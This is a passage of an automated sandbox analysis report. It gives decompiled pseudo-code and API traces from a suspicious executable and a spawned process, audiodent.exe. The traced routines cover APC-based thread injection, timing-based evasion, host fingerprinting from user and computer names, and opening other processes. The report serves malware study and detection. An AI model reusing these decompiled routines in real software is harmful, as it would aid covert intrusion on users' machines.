				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00405fec
0x00405fee
0x00406006
0x0040600b
0x00406010
0x0040604d
0x0040604d
0x00406012
0x00406024
0x0040602f
0x00406035
0x0040603f
0x00000000
0x00000000
0x0040603f
0x00406052

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,00406293,80000002), ref: 00406024
RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 0040602F

Strings

: Completed, xrefs: 00405FE1, 00406015

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403875, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403875() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429854; // 0x0
				_t3 = E0040385A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429854 =  *0x429854 & 0x00000000;
				return _t3;
			}

0x00403876
0x0040387e
0x00403885
0x00403888
0x00403888
0x0040388a
0x0040388f
0x00403896
0x0040389c
0x004038a0
0x004038a1
0x004038a9

APIs

FreeLibrary.KERNEL32(?,7519FA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
GlobalFree.KERNEL32 ref: 00403896

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403875

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88

Uniqueness

Uniqueness Score: -1.00%

Function 00405AD6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AD6(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405ad7
0x00405ae1
0x00405ae3
0x00405aea
0x00405af2
0x00000000
0x00000000
0x00000000
0x00405af2
0x00405af4
0x00405af9

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yRqHWQ91dT.exe,C:\Users\user\Desktop\yRqHWQ91dT.exe,80000000,00000003), ref: 00405ADC
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yRqHWQ91dT.exe,C:\Users\user\Desktop\yRqHWQ91dT.exe,80000000,00000003), ref: 00405AEA

Strings

C:\Users\user\Desktop, xrefs: 00405AD6

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00405BF5, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405c05
0x00405c07
0x00405c0a
0x00405c36
0x00405c0f
0x00405c18
0x00405c1d
0x00405c28
0x00405c2b
0x00405c47
0x00405c2d
0x00405c34
0x00000000
0x00405c34
0x00405c40
0x00405c44
0x00405c44
0x00405c3e
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: audiodent.exe PID: 5656 Parent PID: 2952 audiodent.exeCOMMON

Executed Functions

Function 009819A0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 140
threadsleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E009819A0() {
				long _v8;
				long _v12;
				long _v16;
				void* _v40;
				void* __edi;
				long _t31;
				long _t33;
				long _t34;
				void* _t37;
				long _t40;
				long _t41;
				long _t45;
				void* _t48;
				struct _SECURITY_ATTRIBUTES* _t50;
				signed int _t54;
				signed int _t55;
				struct _SECURITY_ATTRIBUTES* _t59;
				long _t61;
				signed int _t62;
				void* _t66;
				void* _t69;
				signed int _t71;
				signed int _t72;
				void* _t75;
				intOrPtr* _t76;

				_t31 = E00981752();
				_t59 = 0;
				_v8 = _t31;
				if(_t31 != 0) {
					return _t31;
				}
				do {
					_t71 = 0;
					_v16 = _t59;
					_v12 = 0x30;
					do {
						_t66 = E009816EE(_v12);
						if(_t66 == _t59) {
							_v8 = 8;
						} else {
							_t54 = NtQuerySystemInformation(8, _t66, _v12,  &_v16); // executed
							_t62 = _t54;
							_t55 = _t54 & 0x0000ffff;
							_v8 = _t55;
							if(_t55 == 4) {
								_v12 = _v12 + 0x30;
							}
							_t72 = 0x13;
							_t15 = _t62 + 1; // 0x1
							_t71 =  *_t66 % _t72 + _t15;
							E009817CB(_t66);
						}
					} while (_v8 != _t59);
					_t33 = E009814AD(_t66, _t71); // executed
					_v8 = _t33;
					Sleep(_t71 << 4); // executed
					_t34 = _v8;
				} while (_t34 == 9);
				if(_t34 != _t59) {
					L28:
					return _t34;
				}
				if(E009817E0(_t62,  &_v12) != 0) {
					 *0x9830f8 = _t59;
					L18:
					_t37 = CreateThread(_t59, _t59, __imp__SleepEx,  *0x983100, _t59, _t59); // executed
					_t75 = _t37;
					if(_t75 == _t59) {
						L25:
						_v8 = GetLastError();
						L26:
						_t34 = _v8;
						if(_t34 == 0xffffffff) {
							_t34 = GetLastError();
						}
						goto L28;
					}
					_t40 = QueueUserAPC(E009813C4, _t75,  &_v40); // executed
					if(_t40 == 0) {
						_t45 = GetLastError();
						_v16 = _t45;
						TerminateThread(_t75, _t45);
						CloseHandle(_t75);
						_t75 = 0;
						SetLastError(_v16);
					}
					if(_t75 == 0) {
						goto L25;
					} else {
						_t41 = WaitForSingleObject(_t75, 0xffffffff);
						_v8 = _t41;
						if(_t41 == 0) {
							GetExitCodeThread(_t75,  &_v8);
						}
						CloseHandle(_t75);
						goto L26;
					}
				}
				_t76 = __imp__GetLongPathNameW;
				_t61 = _v12;
				_t48 =  *_t76(_t61, _t59, _t59); // executed
				_t69 = _t48;
				if(_t69 == 0) {
					L15:
					 *0x9830f8 = _t61;
					L16:
					_t59 = 0;
					goto L18;
				}
				_t23 = _t69 + 2; // 0x2
				_t50 = E009816EE(_t69 + _t23);
				 *0x9830f8 = _t50;
				if(_t50 == 0) {
					goto L15;
				}
				 *_t76(_t61, _t50, _t69); // executed
				E009817CB(_t61);
				goto L16;
			}

0x009819a7
0x009819ac
0x009819ae
0x009819b3
0x00981b1b
0x00981b1b
0x009819bb
0x009819bb
0x009819bd
0x009819c0
0x009819c7
0x009819cf
0x009819d3
0x00981a0d
0x009819d5
0x009819df
0x009819e5
0x009819e7
0x009819ec
0x009819f2
0x009819f4
0x009819f4
0x009819fc
0x00981a02
0x00981a02
0x00981a06
0x00981a06
0x00981a14
0x00981a1a
0x00981a23
0x00981a26
0x00981a2c
0x00981a2f
0x00981a36
0x00981b17
0x00000000
0x00981b18
0x00981a47
0x00981a87
0x00981a8d
0x00981a9d
0x00981aa3
0x00981aad
0x00981b08
0x00981b0a
0x00981b0d
0x00981b0d
0x00981b13
0x00981b15
0x00981b15
0x00000000
0x00981b13
0x00981ab9
0x00981ac7
0x00981ac9
0x00981acd
0x00981ad0
0x00981ad7
0x00981adc
0x00981ade
0x00981ade
0x00981ae6
0x00000000
0x00981ae8
0x00981aeb
0x00981af1
0x00981af6
0x00981afd
0x00981afd
0x00981b04
0x00000000
0x00981b04
0x00981ae6
0x00981a49
0x00981a51
0x00981a55
0x00981a57
0x00981a5b
0x00981a7d
0x00981a7d
0x00981a83
0x00981a83
0x00000000
0x00981a83
0x00981a5d
0x00981a62
0x00981a67
0x00981a6e
0x00000000
0x00000000
0x00981a73
0x00981a76
0x00000000

APIs

Part of subcall function 00981752: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,009819AC), ref: 00981761
Part of subcall function 00981752: GetVersion.KERNEL32 ref: 00981770
Part of subcall function 00981752: GetCurrentProcessId.KERNEL32 ref: 0098178C
Part of subcall function 00981752: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 009817A5

Part of subcall function 009816EE: HeapAlloc.KERNEL32(00000000,?,009819CF,00000030,?,00000000), ref: 009816FA

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 009819DF
Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00981A26
GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00981A55
GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00981A73
CreateThread.KERNEL32 ref: 00981A9D
QueueUserAPC.KERNEL32(009813C4,00000000,?,?,00000000), ref: 00981AB9
GetLastError.KERNEL32(?,00000000), ref: 00981AC9
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00981AD0
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00981AD7
SetLastError.KERNEL32(?,?,00000000), ref: 00981ADE
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00981AEB
GetExitCodeThread.KERNEL32(00000000,00000008,?,00000000), ref: 00981AFD
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00981B04
GetLastError.KERNEL32(?,00000000), ref: 00981B08
GetLastError.KERNEL32(?,00000000), ref: 00981B15

Strings

0, xrefs: 009819F4

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Thread$CloseCreateHandleLongNamePathProcess$AllocCodeCurrentEventExitHeapInformationObjectOpenQueryQueueSingleSleepSystemTerminateUserVersionWait
String ID: 0
API String ID: 2806485730-4108050209
Opcode ID: 31b48449fb99e1a5be6bb7d49b32004c04cd9e4ce78cc861f59011113b5c5bd8
Instruction ID: c666ecb3b7d875e00a8ac0294cc12c85f6c47cb2777fbf6a23a2f921aacabebe
Opcode Fuzzy Hash: 31b48449fb99e1a5be6bb7d49b32004c04cd9e4ce78cc861f59011113b5c5bd8
Instruction Fuzzy Hash: 51418C72D05219BBDB10BFA5CC84DAEBABCEF48314B10456AE505E3350E7349E42EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EA60A70, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 69librarythreadloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,?), ref: 6EA60A8E
GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6EA60AA3
GetCurrentThread.KERNEL32 ref: 6EA60ADC
SetThreadDescription.KERNELBASE(00000000), ref: 6EA60AE3
IsDebuggerPresent.KERNEL32(?), ref: 6EA60AF3
RaiseException.KERNEL32(406D1388,00000000,00000004,00001000,?,?,?,?,?,?,?,?,?,?,6EA60971,?), ref: 6EA60B4A

Strings

UTF-8, xrefs: 6EA60AC3
kernel32.dll, xrefs: 6EA60A89
SetThreadDescription, xrefs: 6EA60A9D
SDL_WINDOWS_DISABLE_THREAD_NAMING, xrefs: 6EA60AFF
UTF-16LE, xrefs: 6EA60AC8

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AddressCurrentDebuggerDescriptionExceptionLibraryLoadPresentProcRaise
String ID: SDL_WINDOWS_DISABLE_THREAD_NAMING$SetThreadDescription$UTF-16LE$UTF-8$kernel32.dll
API String ID: 3753248866-3094075066
Opcode ID: ec02ede88ba1c74606c9ef9c3c5aca797820603f66cfe1f5dec630a2853d53eb
Instruction ID: 4756e9d18dd81a2d5d51ef5b76af50c4e7ba927fb01ed04c84d6a06f583aeae3
Opcode Fuzzy Hash: ec02ede88ba1c74606c9ef9c3c5aca797820603f66cfe1f5dec630a2853d53eb
Instruction Fuzzy Hash: 91115770410701AFEB109FA88E59FAB37ACAB46728F084428F804D6380F770D4D1CAAA

Uniqueness

Uniqueness Score: -1.00%

Function 00981E22, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00981E22(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00981F3A();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x983104;
				_push(_t15 + 0x98405e);
				_push(_t15 + 0x984054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00981F34();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x983108, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00981e22
0x00981e2b
0x00981e2f
0x00981e35
0x00981e3a
0x00981e3f
0x00981e42
0x00981e45
0x00981e4a
0x00981e4b
0x00981e4e
0x00981e59
0x00981e60
0x00981e64
0x00981e66
0x00981e67
0x00981e6a
0x00981e6f
0x00981e79
0x00981e7b
0x00981e7b
0x00981e8f
0x00981e95
0x00981e99
0x00981ee9
0x00981e9b
0x00981ea4
0x00981eba
0x00981ec2
0x00981ed4
0x00981ed8
0x00000000
0x00000000
0x00981ec4
0x00981ec7
0x00981ecc
0x00981ece
0x00981ece
0x00981eaf
0x00981eb1
0x00981eda
0x00981edb
0x00981edb
0x00981ea4
0x00981ef1

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0098143D,0000000A,?,?), ref: 00981E2F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00981E45
_snwprintf.NTDLL ref: 00981E6A
CreateFileMappingW.KERNELBASE(000000FF,00983108,00000004,00000000,?,?), ref: 00981E8F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0098143D,0000000A,?), ref: 00981EA6
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00981EBA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0098143D,0000000A,?), ref: 00981ED2
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0098143D,0000000A), ref: 00981EDB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0098143D,0000000A,?), ref: 00981EE3

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 7436d01923c747fe7d61bf69c6a11dd1ac4febcd84ba307571475e032972ea55
Instruction ID: 3ad28af7d74b2a376cbfd3db2b9e738aeb6591276d6e9ed726fd38168b4b526c
Opcode Fuzzy Hash: 7436d01923c747fe7d61bf69c6a11dd1ac4febcd84ba307571475e032972ea55
Instruction Fuzzy Hash: 6B218EB2A04109BFDB11AFA8DC84EAE37ADEB48354F114025FA16E7391D7749D42DB60

Uniqueness

Uniqueness Score: -1.00%

Function 07F77A2E, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E07F77A2E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x7f7d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E07F74F97( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x7f7d2a4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x7f7d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E07F72C0D(_v8 + _v8, _t64);
							}
							HeapFree( *0x7f7d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x7f7d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E07F72C0D(_v8 + _v8, _t64);
						}
						HeapFree( *0x7f7d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x07f77a2e
0x07f77a36
0x07f77a3a
0x07f77a3d
0x07f77a42
0x07f77a44
0x07f77a49
0x07f77a49
0x07f77a4f
0x07f77a51
0x07f77a5e
0x07f77abf
0x07f77a60
0x07f77a65
0x07f77a6b
0x07f77a70
0x07f77a7e
0x07f77a82
0x07f77a91
0x07f77a98
0x07f77a9f
0x07f77a9f
0x07f77aaa
0x07f77aaa
0x07f77a82
0x07f77a70
0x07f77ac1
0x07f77ac7
0x07f77ad1
0x07f77ad3
0x07f77ad8
0x07f77ae7
0x07f77aeb
0x07f77af6
0x07f77afd
0x07f77b04
0x07f77b04
0x07f77b10
0x07f77b10
0x07f77aeb
0x07f77b1b
0x07f77b1d
0x07f77b20
0x07f77b22
0x07f77b25
0x07f77b28
0x07f77b32
0x07f77b36
0x07f77b3a

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 07F77A65
RtlAllocateHeap.NTDLL(00000000,?), ref: 07F77A7C
GetUserNameW.ADVAPI32(00000000,?), ref: 07F77A89
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,07F730EE), ref: 07F77AAA
GetComputerNameW.KERNEL32(00000000,00000000), ref: 07F77AD1
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 07F77AE5
GetComputerNameW.KERNEL32(00000000,00000000), ref: 07F77AF2
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,07F730EE), ref: 07F77B10

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 58fa9644498adf8d776f414f4303cf5034422a6e0d3ebb331a240060ce1126ba
Instruction ID: 2385f0c78d04c96c371a3cb8b981a40cbaeb0c19fa5ce660eec9f32978930722
Opcode Fuzzy Hash: 58fa9644498adf8d776f414f4303cf5034422a6e0d3ebb331a240060ce1126ba
Instruction Fuzzy Hash: 2A312DB1A1020AEFE710EFB9DC81A6EB7F9FF48209B55446AE505D7210DB34DA01DB20

Uniqueness

Uniqueness Score: -1.00%

Function 07F79A0F, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E07F79A0F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E07F71525(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E07F78B22(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x07f79a1c
0x07f79a1d
0x07f79a1e
0x07f79a1f
0x07f79a20
0x07f79a24
0x07f79a2b
0x07f79a3a
0x07f79a3d
0x07f79a40
0x07f79a47
0x07f79a4a
0x07f79a4d
0x07f79a50
0x07f79a53
0x07f79a5e
0x07f79a60
0x07f79a69
0x07f79a71
